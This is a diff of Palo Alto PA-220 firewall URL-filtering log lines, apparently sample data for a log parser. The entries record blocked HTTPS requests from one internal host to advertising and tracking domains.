-Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 
16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 
16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 
16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 
16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:28 PA-220 1,2018/11/30 
16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
